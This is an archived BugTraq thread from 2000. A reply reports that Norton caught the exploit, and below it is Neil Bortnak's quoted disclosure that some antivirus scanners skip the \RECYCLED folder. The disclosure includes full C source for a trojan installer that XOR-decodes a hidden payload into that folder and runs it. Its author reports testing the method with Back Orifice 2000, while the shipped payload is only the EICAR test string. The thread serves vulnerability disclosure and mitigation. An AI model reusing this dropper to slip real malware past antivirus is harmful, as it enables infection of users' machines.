This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. --=_989cf2d95247d2ca12723275a5763dd8 Content-Type: text/plain; charset="iso-8859-1" I'm using NAV 5.02.00 with all updates and the latest definitions. I have NOT modified the preferences except to turn off the weekly scan of all files. (Such a scan is redundant to scanning files as they are executed. This is the "Auto-Protect" feature of NAV.) Running the executable "virusexploit0100.exe" caused NAV to alert. It saw the virus signature and denied access to the file. It did this from memory, not from a directory. If normal scanning (Auto-Protect) is turned on (as it is by default) then this exploit should not work in any version of NAV that I'm familiar with, versions 3.0 for Windows 95 and up. Russ -----Original Message----- From: Neil Bortnak [mailto:neilat_private] Sent: Sunday, January 30, 2000 9:40 PM To: BUGTRAQat_private Subject: Bypass Virus Checking Greetings All, I originally released this vulnerability over the Christmas holidays on NTBugTraq. I spoke with a member of the Security Focus staff about getting it onto the web site and was told that I should post the problem here. During our conversation we decided that I hadn't been clear in my last posting and that I should re-do it complete with working exploit and source code. I hope this one makes more sense. The new version follows. Best Regards, Neil Bortnak InfoSec & Linux Consulting www.bortnak.com 1.Background ------------ Under Win95/98 the Recycle Bin is a system designed to make it easy for users to "undelete" files. When a user deletes from the GUI, the file is not really deleted but moved to a folder named "RECYCLED" located at the root of that volume. If the folder does not exist, possibly because nothing has ever been deleted on that volume, the directory is created. The file is then renamed and information about the file's original name and location are stored in an index file. When you look at the recycle bin through the GUI, Windows reads the index files from each volume and displays their contents. It does not display a raw directory listing. You cannot easily access a raw directory listing through the GUI. When you empty the recycle bin, Windows deletes all of the files in the RECYCLED directories that have a corresponding entry in one of the indexes. Therefore a file stored in a RECYCLED directory via DOS or a program will not show up anywhere in the GUI and will not be deleted when you empty the Recycle Bin. 2. The Problem -------------- By default, some virus checkers exclude the files from their batch and on-access scanning whose pathnames begin with \RECYCLED. That is, all files and subdirectories within the RECYCLED folder on every volume will ***NEVER BE SCANNED*** for any reason. Therefore you can store and run malicious code from these directories without setting off the virus checker. Since these files wouldn't have an entry in the Recycle Bin's index file, they will never be deleted. It's a safe haven. 3. Exploitation Difficulties ---------------------------- The difficult part about making this work from an attacker's point of view is getting the malicious code to the \RECYCLED directory. An e-mail virus checker will catch it as it comes into the network, and on-access scanning will catch it from the floppy drive. I've worked out two methods for getting the files into position without setting off the checkers. 3.1 Trojan with encoded payload ------------------------------- In my proof-of-concept code, I took one of those fun little games that are going around and made an "installation" program for it. The program uses a WinZip self-installer containing 3 files: a clean version of the fun game (hereafter known as the decoy), a setup program and a file called winsetup.dll. The winsetup.dll file is in fact the malicious program encoded by XORing all it's bytes with 25. By doing this the archive passes all virus checks with flying colors. This nicely bypasses any perimeter, e-mail, batch and on-access scans. When executed the WinZip installer extracts the files to a temporary directory and runs the setup program. The setup program copies the decoy to the users desktop. If a \RECYCLED directory doesn't exist, the setup program makes one. It then opens the winsetup.dll file for reading and creates a new file in the \RECYCLED directory. It copies the winsetup.dll file into it's new home 4k at a time, XORing it back to the original malicious executable. The setup program runs the malicious code in a hidden window and exits. I tested this idea using Back Orifice 2000. I configured it to install itself back into the RECYCLED directory after being run for the first time. It worked just fine. I downloaded the trojan, executed it, and connected to the BO2K server from another computer and none of the intervening virus checkers complained. That's really not supposed to happen. 3.2 On a CD-ROM --------------- I didn't test this, but CD-ROMs are also excluded by default on some checkers. Someone can give it a try if they like (I haven't got a burner, but the theory is sound). 4. Notes on NT -------------- The exploit works great under NT. The anti-virus folk make the same exclusions with NT checkers, presumably to deal with dual boot systems. NT's default permissions allow this to work even when the machine is not dual boot and has NTFS on all drives because EVERYONE can create directories at the root. Just make a \RECYCLED directory and away you go. 5. General Notes ---------------- I don't see why the \RECYCLED directory is excluded. It's even more strange when you consider that the \RECYCLER directories ARE scanned. The \RECYCLER directory stores the Recycle Bin's files under NT. One remark I had from an AV vendor implied that it was unreasonable to scan files in order to catch XORed or encrypted viruses. That's probably true, but the whole thing works because of the exclusion of the \RECYCLED directory. That's the crux of the issue, the rest of the code just exploits the real problem. 6. Vulnerable Scanners ---------------------- These are the results from the checker I have available. McAfee Virus Scan Engine: 4050 DATs: 4062 Vulnerable Norton Anti-Virus Engine: 5.01.01C DATs: 01/24/00 Vulnerable Norton Anti-Virus Engine: 5.00.01C DATs: 01/24/00 Not Vulnerable: Identifies EICAR.COM as Bloodhound.File.String The problem is more sinister with NAV because the \RECYCLED directory DOES NOT APPEAR on the exclusions list. It's hidden and can be found only by having a look at the preferences file with a hex editor. There are other hidden exclusions in that file, but I haven't had the opportunity to think about possible exploits yet. 7. Solutions ------------ With McAfee, just go into the exclusions tab and delete the \RECYCLED entry. You do that at your own risk of course, as I have no idea why it was excluded in the first place. As for NAV, I don't really have a good solution that doesn't involve doing creative things with a hex editor or installing software, which is to say that I don't have a good solution. 8. The virusexploit0100.exe file -------------------------------- Included in this e-mail is a working exploit for this vulnerability. If you run the executable and your virus checker does not complain, check for the existence of an EICAR.COM file in the \RECYCLED directory. The correct \RECYCLED directory is almost certainly on your C: drive. If it exists your virus checker is vulnerable. To tidy up after the test, delete the decoy.exe program file that was copied to your desktop and the \RECYCLED\EICAR.COM file. Appendix A. Source Code -------------- The following source files are for the programs that come in the virusexploit0100.exe. A.1 setup.c ----------- /* Setup program for bypassing virus checkers */ #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <stdlib.h> #include <dir.h> #include <io.h> #include <stdio.h> #include <windows.h> #define SOURCE_FILE ".\\winsetup.dll" #define DEST_FILE "\\recycled\\eicar.com" #define DECOY_FILE ".\\decoy.exe" #define DECOY_DIR_KEY "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders" #define DECOY_DIR_VAL "Desktop" #define BUFSIZE 4096 #define XORME 25 int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow) { int sourcefile, destfile, bytesin,i; char buffer[BUFSIZE],szDirName[256],szDecoyDir[512]; long lerror; HKEY regkey; DWORD ValSize = sizeof(szDirName); /* How annoying */ /* Find out where the desktop is so we can put the decoy there */ if((lerror = RegOpenKeyEx(HKEY_CURRENT_USER,DECOY_DIR_KEY,0,KEY_QUERY_VALUE,®key)) != ERROR_SUCCESS) { exit(0); } if((lerror = RegQueryValueEx(regkey,DECOY_DIR_VAL,0,NULL,&szDirName[0],&ValSize)) != ERROR_SUCCESS) { exit(0); } RegCloseKey(regkey); /* Expand the dir name on the off chance it contains ENV vars */ ExpandEnvironmentStrings(&szDirName[0],&szDecoyDir[0],sizeof(szDecoyDir)); rename(DECOY_FILE,strcat(szDecoyDir,DECOY_FILE)); /* It doesn't matter what mkdir's return code is. It'll make the dir if it doesn't exist or fail of it does */ mkdir("\\recycled"); /* Prepare to "decrypt" the infected executable */ if((sourcefile = open(SOURCE_FILE,O_RDONLY | O_BINARY)) == -1) { exit(0); } if((destfile = open(DEST_FILE,O_WRONLY | O_CREAT | O_EXCL | O_BINARY, S_IREAD | S_IWRITE)) == -1) { exit(0); } /* "Decrypt" it */ while((bytesin = read(sourcefile,&buffer[0],BUFSIZE)) != 0) { for(i=0;i<bytesin;i++) { buffer[i] ^= XORME; } write(destfile,&buffer[0],bytesin); } close(sourcefile); close(destfile); /* Run the infected executable. You would normally use SW_HIDE here. */ WinExec(DEST_FILE,SW_SHOWNORMAL); return(0); } A.2 decoy.c ----------- /* A lame decoy program by Neil Bortnak */ #include <windows.h> int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow) { char message[] = "This is the decoy program. Normally you'd use a fun little game\nor a self-playing animation of questionable taste."; MessageBox(NULL,&message[0],"Virus Test",MB_OK | MB_ICONINFORMATION); return(0); } A.3 winsetup.dll ---------------- The unencoded form of this file is a standard EICAR.COM test string. --=_989cf2d95247d2ca12723275a5763dd8 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> <HTML> <HEAD> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = charset=3Diso-8859-1"> <META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version = 5.5.2650.12"> <TITLE>RE: Bypass Virus Checking</TITLE> </HEAD> <BODY> <P><FONT SIZE=3D2>I'm using NAV 5.02.00 with all updates and the latest = definitions. I have NOT modified the preferences except to turn off the = weekly scan of all files. (Such a scan is redundant to scanning files = as they are executed. This is the "Auto-Protect" feature of = NAV.)</FONT></P> <P><FONT SIZE=3D2>Running the executable = "virusexploit0100.exe" caused NAV to alert. It saw the virus = signature and denied access to the file. It did this from memory, not = from a directory. If normal scanning (Auto-Protect) is turned on (as it = is by default) then this exploit should not work in any version of NAV = that I'm familiar with, versions 3.0 for Windows 95 and up.</FONT></P> <P><FONT SIZE=3D2>Russ</FONT> </P> <P><FONT SIZE=3D2>-----Original Message-----</FONT> <BR><FONT SIZE=3D2>From: Neil Bortnak [<A = HREF=3D"mailto:neilat_private">mailto:neilat_private</A>]</FONT> <BR><FONT SIZE=3D2>Sent: Sunday, January 30, 2000 9:40 PM</FONT> <BR><FONT SIZE=3D2>To: BUGTRAQat_private</FONT> <BR><FONT SIZE=3D2>Subject: Bypass Virus Checking</FONT> </P> <BR> <P><FONT SIZE=3D2>Greetings All,</FONT> </P> <P><FONT SIZE=3D2>I originally released this vulnerability over the = Christmas holidays on</FONT> <BR><FONT SIZE=3D2>NTBugTraq. I spoke with a member of the Security = Focus staff about</FONT> <BR><FONT SIZE=3D2>getting it onto the web site and was told that I = should post the problem</FONT> <BR><FONT SIZE=3D2>here. During our conversation we decided that I = hadn't been clear in my</FONT> <BR><FONT SIZE=3D2>last posting and that I should re-do it complete = with working exploit</FONT> <BR><FONT SIZE=3D2>and source code. I hope this one makes more sense. = The new version</FONT> <BR><FONT SIZE=3D2>follows.</FONT> </P> <P><FONT SIZE=3D2>Best Regards,</FONT> </P> <P><FONT SIZE=3D2>Neil Bortnak</FONT> <BR><FONT SIZE=3D2>InfoSec & Linux Consulting</FONT> <BR><FONT SIZE=3D2>www.bortnak.com</FONT> </P> <BR> <P><FONT SIZE=3D2>1.Background</FONT> <BR><FONT SIZE=3D2>------------</FONT> </P> <P><FONT SIZE=3D2>Under Win95/98 the Recycle Bin is a system designed = to make it easy for</FONT> <BR><FONT SIZE=3D2>users to "undelete" files. When a user = deletes from the GUI, the file is</FONT> <BR><FONT SIZE=3D2>not really deleted but moved to a folder named = "RECYCLED" located at the</FONT> <BR><FONT SIZE=3D2>root of that volume. If the folder does not exist, = possibly because</FONT> <BR><FONT SIZE=3D2>nothing has ever been deleted on that volume, the = directory is created.</FONT> <BR><FONT SIZE=3D2>The file is then renamed and information about the = file's original name</FONT> <BR><FONT SIZE=3D2>and location are stored in an index file. When you = look at the recycle</FONT> <BR><FONT SIZE=3D2>bin through the GUI, Windows reads the index files = from each volume and</FONT> <BR><FONT SIZE=3D2>displays their contents. It does not display a raw = directory listing.</FONT> <BR><FONT SIZE=3D2>You cannot easily access a raw directory listing = through the GUI. When</FONT> <BR><FONT SIZE=3D2>you empty the recycle bin, Windows deletes all of = the files in the</FONT> <BR><FONT SIZE=3D2>RECYCLED directories that have a corresponding entry = in one of the</FONT> <BR><FONT SIZE=3D2>indexes. Therefore a file stored in a RECYCLED = directory via DOS or a</FONT> <BR><FONT SIZE=3D2>program will not show up anywhere in the GUI and = will not be deleted</FONT> <BR><FONT SIZE=3D2>when you empty the Recycle Bin.</FONT> </P> <BR> <P><FONT SIZE=3D2>2. The Problem</FONT> <BR><FONT SIZE=3D2>--------------</FONT> </P> <P><FONT SIZE=3D2>By default, some virus checkers exclude the files = from their batch and</FONT> <BR><FONT SIZE=3D2>on-access scanning whose pathnames begin with = \RECYCLED. That is, all</FONT> <BR><FONT SIZE=3D2>files and subdirectories within the RECYCLED folder = on every volume will</FONT> <BR><FONT SIZE=3D2>***NEVER BE SCANNED*** for any reason. Therefore you = can store and run</FONT> <BR><FONT SIZE=3D2>malicious code from these directories without = setting off the virus</FONT> <BR><FONT SIZE=3D2>checker. Since these files wouldn't have an entry in = the Recycle Bin's</FONT> <BR><FONT SIZE=3D2>index file, they will never be deleted. It's a safe = haven.</FONT> </P> <BR> <P><FONT SIZE=3D2>3. Exploitation Difficulties</FONT> <BR><FONT SIZE=3D2>----------------------------</FONT> </P> <P><FONT SIZE=3D2>The difficult part about making this work from an = attacker's point of</FONT> <BR><FONT SIZE=3D2>view is getting the malicious code to the \RECYCLED = directory. An e-mail</FONT> <BR><FONT SIZE=3D2>virus checker will catch it as it comes into the = network, and on-access</FONT> <BR><FONT SIZE=3D2>scanning will catch it from the floppy drive. I've = worked out two</FONT> <BR><FONT SIZE=3D2>methods for getting the files into position without = setting off the</FONT> <BR><FONT SIZE=3D2>checkers.</FONT> </P> <BR> <P><FONT SIZE=3D2>3.1 Trojan with encoded payload</FONT> <BR><FONT SIZE=3D2>-------------------------------</FONT> </P> <P><FONT SIZE=3D2>In my proof-of-concept code, I took one of those fun = little games that</FONT> <BR><FONT SIZE=3D2>are going around and made an = "installation" program for it. The program</FONT> <BR><FONT SIZE=3D2>uses a WinZip self-installer containing 3 files: a = clean version of the</FONT> <BR><FONT SIZE=3D2>fun game (hereafter known as the decoy), a setup = program and a file</FONT> <BR><FONT SIZE=3D2>called winsetup.dll. The winsetup.dll file is in = fact the malicious</FONT> <BR><FONT SIZE=3D2>program encoded by XORing all it's bytes with 25. By = doing this the</FONT> <BR><FONT SIZE=3D2>archive passes all virus checks with flying colors. = This nicely bypasses</FONT> <BR><FONT SIZE=3D2>any perimeter, e-mail, batch and on-access = scans.</FONT> </P> <P><FONT SIZE=3D2>When executed the WinZip installer extracts the files = to a temporary</FONT> <BR><FONT SIZE=3D2>directory and runs the setup program. The setup = program copies the decoy</FONT> <BR><FONT SIZE=3D2>to the users desktop. If a \RECYCLED directory = doesn't exist, the setup</FONT> <BR><FONT SIZE=3D2>program makes one. It then opens the winsetup.dll = file for reading and</FONT> <BR><FONT SIZE=3D2>creates a new file in the \RECYCLED directory. It = copies the</FONT> <BR><FONT SIZE=3D2>winsetup.dll file into it's new home 4k at a time, = XORing it back to the</FONT> <BR><FONT SIZE=3D2>original malicious executable. The setup program = runs the malicious code</FONT> <BR><FONT SIZE=3D2>in a hidden window and exits.</FONT> </P> <P><FONT SIZE=3D2>I tested this idea using Back Orifice 2000. I = configured it to install</FONT> <BR><FONT SIZE=3D2>itself back into the RECYCLED directory after being = run for the first</FONT> <BR><FONT SIZE=3D2>time. It worked just fine. I downloaded the trojan, = executed it, and</FONT> <BR><FONT SIZE=3D2>connected to the BO2K server from another computer = and none of the</FONT> <BR><FONT SIZE=3D2>intervening virus checkers complained. That's really = not supposed to</FONT> <BR><FONT SIZE=3D2>happen.</FONT> </P> <BR> <P><FONT SIZE=3D2>3.2 On a CD-ROM</FONT> <BR><FONT SIZE=3D2>---------------</FONT> </P> <P><FONT SIZE=3D2>I didn't test this, but CD-ROMs are also excluded by = default on some</FONT> <BR><FONT SIZE=3D2>checkers. Someone can give it a try if they like (I = haven't got a</FONT> <BR><FONT SIZE=3D2>burner, but the theory is sound).</FONT> </P> <BR> <P><FONT SIZE=3D2>4. Notes on NT</FONT> <BR><FONT SIZE=3D2>--------------</FONT> </P> <P><FONT SIZE=3D2>The exploit works great under NT. The anti-virus folk = make the same</FONT> <BR><FONT SIZE=3D2>exclusions with NT checkers, presumably to deal with = dual boot systems.</FONT> <BR><FONT SIZE=3D2>NT's default permissions allow this to work even = when the machine is not</FONT> <BR><FONT SIZE=3D2>dual boot and has NTFS on all drives because = EVERYONE can create</FONT> <BR><FONT SIZE=3D2>directories at the root. Just make a \RECYCLED = directory and away you</FONT> <BR><FONT SIZE=3D2>go.</FONT> </P> <BR> <P><FONT SIZE=3D2>5. General Notes</FONT> <BR><FONT SIZE=3D2>----------------</FONT> </P> <P><FONT SIZE=3D2>I don't see why the \RECYCLED directory is excluded. = It's even more</FONT> <BR><FONT SIZE=3D2>strange when you consider that the \RECYCLER = directories ARE scanned.</FONT> <BR><FONT SIZE=3D2>The \RECYCLER directory stores the Recycle Bin's = files under NT. One</FONT> <BR><FONT SIZE=3D2>remark I had from an AV vendor implied that it was = unreasonable to scan</FONT> <BR><FONT SIZE=3D2>files in order to catch XORed or encrypted viruses. = That's probably</FONT> <BR><FONT SIZE=3D2>true, but the whole thing works because of the = exclusion of the</FONT> <BR><FONT SIZE=3D2>\RECYCLED directory. That's the crux of the issue, = the rest of the code</FONT> <BR><FONT SIZE=3D2>just exploits the real problem.</FONT> </P> <BR> <P><FONT SIZE=3D2>6. Vulnerable Scanners</FONT> <BR><FONT SIZE=3D2>----------------------</FONT> </P> <P><FONT SIZE=3D2>These are the results from the checker I have = available.</FONT> </P> <P> <FONT SIZE=3D2>McAfee = Virus Scan</FONT> <BR> <FONT SIZE=3D2>Engine: = 4050</FONT> <BR> <FONT = SIZE=3D2>DATs: 4062</FONT> <BR> <FONT = SIZE=3D2>Vulnerable</FONT> </P> <P> <FONT SIZE=3D2>Norton = Anti-Virus</FONT> <BR> <FONT SIZE=3D2>Engine: = 5.01.01C</FONT> <BR> <FONT = SIZE=3D2>DATs: 01/24/00</FONT> <BR> <FONT = SIZE=3D2>Vulnerable</FONT> </P> <P> <FONT SIZE=3D2>Norton = Anti-Virus</FONT> <BR> <FONT SIZE=3D2>Engine: = 5.00.01C</FONT> <BR> <FONT = SIZE=3D2>DATs: 01/24/00</FONT> <BR> <FONT SIZE=3D2>Not = Vulnerable: Identifies EICAR.COM as Bloodhound.File.String</FONT> </P> <P><FONT SIZE=3D2>The problem is more sinister with NAV because the = \RECYCLED directory</FONT> <BR><FONT SIZE=3D2>DOES NOT APPEAR on the exclusions list. It's hidden = and can be found</FONT> <BR><FONT SIZE=3D2>only by having a look at the preferences file with a = hex editor. There</FONT> <BR><FONT SIZE=3D2>are other hidden exclusions in that file, but I = haven't had the</FONT> <BR><FONT SIZE=3D2>opportunity to think about possible exploits = yet.</FONT> </P> <BR> <P><FONT SIZE=3D2>7. Solutions</FONT> <BR><FONT SIZE=3D2>------------</FONT> </P> <P><FONT SIZE=3D2>With McAfee, just go into the exclusions tab and = delete the \RECYCLED</FONT> <BR><FONT SIZE=3D2>entry. You do that at your own risk of course, as I = have no idea why it</FONT> <BR><FONT SIZE=3D2>was excluded in the first place. As for NAV, I don't = really have a good</FONT> <BR><FONT SIZE=3D2>solution that doesn't involve doing creative things = with a hex editor or</FONT> <BR><FONT SIZE=3D2>installing software, which is to say that I don't = have a good solution.</FONT> </P> <BR> <P><FONT SIZE=3D2>8. The virusexploit0100.exe file</FONT> <BR><FONT SIZE=3D2>--------------------------------</FONT> </P> <P><FONT SIZE=3D2>Included in this e-mail is a working exploit for this = vulnerability. If</FONT> <BR><FONT SIZE=3D2>you run the executable and your virus checker does = not complain, check</FONT> <BR><FONT SIZE=3D2>for the existence of an EICAR.COM file in the = \RECYCLED directory. The</FONT> <BR><FONT SIZE=3D2>correct \RECYCLED directory is almost certainly on = your C: drive. If it</FONT> <BR><FONT SIZE=3D2>exists your virus checker is vulnerable.</FONT> </P> <P><FONT SIZE=3D2>To tidy up after the test, delete the decoy.exe progra= m file that was</FONT> <BR><FONT SIZE=3D2>copied to your desktop and the \RECYCLED\EICAR.COM = file.</FONT> </P> <BR> <P><FONT SIZE=3D2>Appendix A. Source Code</FONT> <BR><FONT SIZE=3D2>--------------</FONT> </P> <P><FONT SIZE=3D2>The following source files are for the programs that = come in the</FONT> <BR><FONT SIZE=3D2>virusexploit0100.exe.</FONT> </P> <BR> <P><FONT SIZE=3D2>A.1 setup.c</FONT> <BR><FONT SIZE=3D2>-----------</FONT> </P> <P><FONT SIZE=3D2>/* Setup program for bypassing virus checkers = */</FONT> </P> <P><FONT SIZE=3D2>#include <sys/types.h></FONT> <BR><FONT SIZE=3D2>#include <sys/stat.h></FONT> <BR><FONT SIZE=3D2>#include <fcntl.h></FONT> <BR><FONT SIZE=3D2>#include <stdlib.h></FONT> <BR><FONT SIZE=3D2>#include <dir.h></FONT> <BR><FONT SIZE=3D2>#include <io.h></FONT> <BR><FONT SIZE=3D2>#include <stdio.h></FONT> <BR><FONT SIZE=3D2>#include <windows.h></FONT> </P> <P><FONT SIZE=3D2>#define SOURCE_FILE = ".\\winsetup.dll"</FONT> <BR><FONT SIZE=3D2>#define DEST_FILE = "\\recycled\\eicar.com"</FONT> <BR><FONT SIZE=3D2>#define DECOY_FILE ".\\decoy.exe"</FONT> <BR><FONT SIZE=3D2>#define DECOY_DIR_KEY</FONT> <BR><FONT = SIZE=3D2>"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\S= hell Folders"</FONT> <BR><FONT SIZE=3D2>#define DECOY_DIR_VAL "Desktop"</FONT> <BR><FONT SIZE=3D2>#define BUFSIZE 4096</FONT> <BR><FONT SIZE=3D2>#define XORME 25</FONT> </P> <P><FONT SIZE=3D2>int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE = hPrevInstance, LPSTR</FONT> <BR><FONT SIZE=3D2>lpszCmdLine, int nCmdShow)</FONT> <BR><FONT SIZE=3D2>{</FONT> <BR><FONT SIZE=3D2>int sourcefile, destfile, bytesin,i;</FONT> <BR><FONT SIZE=3D2>char = buffer[BUFSIZE],szDirName[256],szDecoyDir[512];</FONT> <BR><FONT SIZE=3D2>long lerror;</FONT> <BR><FONT SIZE=3D2>HKEY regkey;</FONT> <BR><FONT SIZE=3D2>DWORD ValSize =3D sizeof(szDirName); /* How annoying = */</FONT> </P> <P><FONT SIZE=3D2>/* Find out where the desktop is so we can put the = decoy there */</FONT> <BR><FONT SIZE=3D2>if((lerror =3D</FONT> <BR><FONT = SIZE=3D2>RegOpenKeyEx(HKEY_CURRENT_USER,DECOY_DIR_KEY,0,KEY_QUERY_VALUE,= &regkey))</FONT> <BR><FONT SIZE=3D2>!=3D ERROR_SUCCESS)</FONT> <BR> <FONT SIZE=3D2>{</FONT> <BR> <FONT = SIZE=3D2>exit(0);</FONT> <BR> <FONT SIZE=3D2>}</FONT> <BR><FONT SIZE=3D2>if((lerror =3D</FONT> <BR><FONT = SIZE=3D2>RegQueryValueEx(regkey,DECOY_DIR_VAL,0,NULL,&szDirName[0],&= amp;ValSize)) !=3D</FONT> <BR><FONT SIZE=3D2>ERROR_SUCCESS)</FONT> <BR> <FONT SIZE=3D2>{</FONT> <BR> <FONT = SIZE=3D2>exit(0);</FONT> <BR> <FONT SIZE=3D2>}</FONT> <BR><FONT SIZE=3D2>RegCloseKey(regkey);</FONT> </P> <BR> <P><FONT SIZE=3D2>/* Expand the dir name on the off chance it contains = ENV vars */</FONT> <BR><FONT = SIZE=3D2>ExpandEnvironmentStrings(&szDirName[0],&szDecoyDir[0],s= izeof(szDecoyDir));</FONT> <BR><FONT = SIZE=3D2>rename(DECOY_FILE,strcat(szDecoyDir,DECOY_FILE));</FONT> </P> <BR> <P><FONT SIZE=3D2>/* It doesn't matter what mkdir's return code is. = It'll make the dir if</FONT> <BR><FONT SIZE=3D2>it</FONT> <BR><FONT SIZE=3D2>doesn't exist or fail of it does */</FONT> <BR><FONT SIZE=3D2>mkdir("\\recycled");</FONT> </P> <BR> <P><FONT SIZE=3D2>/* Prepare to "decrypt" the infected = executable */</FONT> <BR><FONT SIZE=3D2>if((sourcefile =3D open(SOURCE_FILE,O_RDONLY | = O_BINARY)) =3D=3D -1)</FONT> <BR> <FONT SIZE=3D2>{</FONT> <BR> <FONT = SIZE=3D2>exit(0);</FONT> <BR> <FONT SIZE=3D2>}</FONT> <BR><FONT SIZE=3D2>if((destfile =3D open(DEST_FILE,O_WRONLY | O_CREAT | = O_EXCL | O_BINARY,</FONT> <BR><FONT SIZE=3D2>S_IREAD | S_IWRITE)) =3D=3D -1)</FONT> <BR> <FONT SIZE=3D2>{</FONT> <BR> <FONT = SIZE=3D2>exit(0);</FONT> <BR> <FONT SIZE=3D2>}</FONT> </P> <P><FONT SIZE=3D2>/* "Decrypt" it */</FONT> <BR><FONT SIZE=3D2>while((bytesin =3D = read(sourcefile,&buffer[0],BUFSIZE)) !=3D 0)</FONT> <BR> <FONT SIZE=3D2>{</FONT> <BR> <FONT = SIZE=3D2>for(i=3D0;i<bytesin;i++)</FONT> <BR> = <FONT SIZE=3D2>{</FONT> <BR> = <FONT SIZE=3D2>buffer[i] = ^=3D XORME;</FONT> <BR> = <FONT SIZE=3D2>}</FONT> <BR> <FONT = SIZE=3D2>write(destfile,&buffer[0],bytesin);</FONT> <BR> <FONT SIZE=3D2>}</FONT> </P> <P><FONT SIZE=3D2>close(sourcefile);</FONT> <BR><FONT SIZE=3D2>close(destfile);</FONT> </P> <P><FONT SIZE=3D2>/* Run the infected executable. You would normally = use SW_HIDE here. */</FONT> <BR><FONT SIZE=3D2>WinExec(DEST_FILE,SW_SHOWNORMAL);</FONT> <BR><FONT SIZE=3D2>return(0);</FONT> <BR><FONT SIZE=3D2>}</FONT> </P> <BR> <P><FONT SIZE=3D2>A.2 decoy.c</FONT> <BR><FONT SIZE=3D2>-----------</FONT> </P> <P><FONT SIZE=3D2>/*</FONT> <BR><FONT SIZE=3D2>A lame decoy program by Neil Bortnak</FONT> <BR><FONT SIZE=3D2>*/</FONT> </P> <P><FONT SIZE=3D2>#include <windows.h></FONT> </P> <P><FONT SIZE=3D2>int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE = hPrevInstance, LPSTR</FONT> <BR><FONT SIZE=3D2>lpszCmdLine, int nCmdShow)</FONT> <BR><FONT SIZE=3D2>{</FONT> <BR><FONT SIZE=3D2>char message[] =3D "This is the decoy program. = Normally you'd use a fun</FONT> <BR><FONT SIZE=3D2>little game\nor a self-playing animation of = questionable taste.";</FONT> <BR><FONT SIZE=3D2>MessageBox(NULL,&message[0],"Virus = Test",MB_OK | MB_ICONINFORMATION);</FONT> <BR><FONT SIZE=3D2>return(0);</FONT> <BR><FONT SIZE=3D2>}</FONT> </P> <BR> <P><FONT SIZE=3D2>A.3 winsetup.dll</FONT> <BR><FONT SIZE=3D2>----------------</FONT> </P> <P><FONT SIZE=3D2>The unencoded form of this file is a standard = EICAR.COM test string.</FONT> </P> </BODY> </HTML> --=_989cf2d95247d2ca12723275a5763dd8--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:32:42 PDT